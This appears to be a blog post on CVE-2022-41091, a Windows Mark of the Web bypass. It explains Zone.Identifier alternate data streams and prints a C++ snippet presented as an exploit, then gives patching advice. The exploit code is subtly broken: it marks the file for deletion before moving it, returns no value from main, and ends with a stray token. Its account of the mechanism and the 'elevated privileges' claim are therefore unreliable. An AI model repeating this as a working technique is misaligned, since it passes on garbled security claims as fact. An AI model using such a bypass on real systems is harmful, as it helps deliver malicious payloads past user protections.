Windows has an important security feature called the "Mark of the Web" (MotW), which helps protect users from malicious files downloaded from the internet. The MotW system assigns a Zone Identifier to files and restricts their capabilities when executed in Windows, ensuring they're not treated as fully trusted files. However, a new vulnerability called CVE-2022-41091 has been discovered which allows threat actors to bypass this security feature. Distinct from CVE-2022-41049, this vulnerability significantly undermines the protections offered by the MotW system. In this post, we will delve into the details of this vulnerability, its potential exploit, and how best to protect your system.
Understanding the Vulnerability
The Windows MotW security feature stores Zone Identifier information in an alternate data stream (ADS) attached to the file. When a file has a Zone Identifier, it's usually restricted in its capabilities. However, CVE-2022-41091 exposes a way for threat actors to remove this identifier or manipulate it to achieve their nefarious goals. Essentially, the vulnerability allows an attacker to bypass the MotW protections and execute the payload with higher privileges than it deserves.
The exploit relies on abusing the following WinAPI function
BOOL SetFileInformationByHandle(
_In_ HANDLE hFile,
_In_ FILE_INFO_BY_HANDLE_CLASS FileInfoClass,
_In_ LPVOID lpFileInformation,
_In_ DWORD dwBufferSize
);
Using this function, the attacker manipulates the Zone.Identifier ADS of the file, removing the MotW restrictions. It's usually not possible to directly access the Zone Identifier itself. However, since the attacker can interact with the file via a handle and make use of the mentioned WinAPI function, the exploit becomes possible.
Here's a code snippet demonstrating such an exploit
#include <Windows.h>
#include <iostream>
int main() {
const WCHAR srcPath[] = L"sourceFilePath";
const WCHAR destPath[] = L"destinationFilePath";
HANDLE hFile = CreateFileW(
srcPath,
FILE_GENERIC_WRITE | DELETE,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_BACKUP_SEMANTICS,
NULL);
if (hFile == INVALID_HANDLE_VALUE) {
std::cout << "Error opening file. Error code: " << GetLastError() << std::endl;
return 1;
}
FILE_DISPOSITION_INFO fdi;
fdi.DeleteFile = TRUE;
if (!SetFileInformationByHandle(hFile, FileDispositionInfo, &fdi, sizeof(FILE_DISPOSITION_INFO))) {
CloseHandle(hFile);
std::cout << "Error setting file information. Error code: " << GetLastError() << std::endl;
return 1;
}
CloseHandle(hFile);
if (!MoveFileExW(srcPath, destPath, MOVEFILE_WRITE_THROUGH | MOVEFILE_REPLACE_EXISTING)) {
std::cout << "Error moving file. Error code: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Zone.Identifier successfully bypassed." << std::endl;
return ;
;}
To understand this vulnerability in detail and access the original research, refer to these links
1. Microsoft Security Response Center (MSRC) - CVE-2022-41091
2. NIST National Vulnerability Database - CVE-2022-41091
Mitigation
As of now, Microsoft has released a security update addressing this vulnerability. To protect your system from CVE-2022-41091, apply the relevant updates available via the Windows Update service. Additionally, keep your antivirus software up-to-date and be cautious when downloading files from untrusted sources.
Conclusion
CVE-2022-41091 is a critical vulnerability that bypasses the Windows Mark of the Web security feature. By exploiting this issue, threat actors can execute malicious payloads with elevated privileges. Therefore, it is essential to update your systems and apply any necessary patches to safeguard against this vulnerability. Stay informed about the latest threats and take appropriate security measures to minimize your digital risk.
Timeline
Published on: 11/09/2022 22:15:00 UTC
Last modified on: 11/10/2022 00:33:00 UTC